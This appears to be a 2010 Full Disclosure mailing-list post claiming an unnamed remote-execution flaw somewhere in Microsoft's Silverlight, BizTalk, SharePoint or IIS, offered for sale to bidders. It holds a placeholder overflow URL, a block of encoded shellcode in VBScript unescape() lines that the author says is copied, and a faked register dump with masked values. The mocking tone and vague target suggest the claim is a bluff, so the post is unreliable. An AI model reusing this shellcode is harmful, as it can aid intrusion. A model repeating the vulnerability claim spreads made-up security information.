Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Vulnerability in Huge MS Server
From: musnt live <musntlive () gmail com>
Date: Mon, 14 Jun 2010 13:39:16 -0400

Hello Full-Disclosure,

I'd like to warn you about a big gaping goatse hole in a one of
perhaps Microsoft's server technologies. This vulnerability could be
Silverlight, BizTalk, Sharepoint or IIS server.

Gaping hole so huge, Susan Bradley might may fit through into this hole.

Example:

PoC="http://pzwn:"; + string(xxxxx,"A") + "@www.nomorefreebugs.com/"

In using supercoded technique we find remote execution. Set it and
forget it using copied code:

sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49") & _
unescape("%49%49%49%49%49%49%49%49%49%48%49%49%51%5a%6a%45") & _
unescape("%58%30%41%31%50%41%42%6b%42%41%55%32%42%42%32%41") & _
unescape("%41%30%41%41%58%42%38%42%42%50%75%6d%39%39%6c%6d") & _
unescape("%38%57%34%77%70%67%70%33%30%4c%4b%63%75%75%6c%6c") & _
unescape("%4b%41%6c%75%55%64%38%55%51%4a%4f%4c%4b%42%6f%46") & _
unescape("%78%4e%6b%61%4f%77%50%65%51%78%6b%63%79%4c%4b%47") & _
unescape("%44%6e%6b%47%71%48%6e%65%61%59%50%6e%79%6c%6c%4f") & _
unescape("%74%4f%30%50%74%47%77%6a%61%5a%6a%54%4d%64%41%5a") & _
unescape("%62%68%6b%4a%54%55%6b%42%74%74%64%47%74%70%75%6b") & _
unescape("%55%6c%4b%61%4f%76%44%66%61%5a%4b%71%76%6c%4b%54") & _
unescape("%4c%72%6b%4c%4b%53%6f%77%6c%56%61%7a%4b%4e%6b%65") & _
unescape("%4c%6c%4b%77%71%38%6b%6b%39%43%6c%71%34%74%44%59") & _
unescape("%53%67%41%6f%30%63%54%6e%6b%63%70%70%30%4e%65%4b") & _
unescape("%70%61%68%36%6c%6c%4b%63%70%46%6c%4c%4b%54%30%77") & _
unescape("%6c%4c%6d%6e%6b%55%38%57%78%38%6b%36%69%6e%6b%6f") & _
unescape("%70%4e%50%73%30%75%50%55%50%6e%6b%33%58%77%4c%43") & _
unescape("%6f%50%31%59%66%65%30%33%66%6e%69%69%68%4f%73%4b") & _
unescape("%70%53%4b%42%70%30%68%4a%50%6e%6a%65%54%51%4f%52") & _
unescape("%48%6f%68%4b%4e%6c%4a%66%6e%33%67%4b%4f%6d%37%51") & _
unescape("%73%50%61%62%4c%70%63%56%4e%73%55%73%48%41%75%47") & _
unescape("%70%45")


eax=xxxzzzxz ebx=xxxxx014 ecx=xxxxxc38 edx=c000ffee esi=xxxxx500 edi=xxxxx83c
eip=c000ffee esp=xxxxxxc38 ebp=xxxxxd28 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=xxxxx246
c000ffee ??              ???

Since this no is free bugs. Opening bid for multipurpose remote server
PoC affecting: I no SHARE right now -- only to serious bidder who no
blink at 5 digits before decimal.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]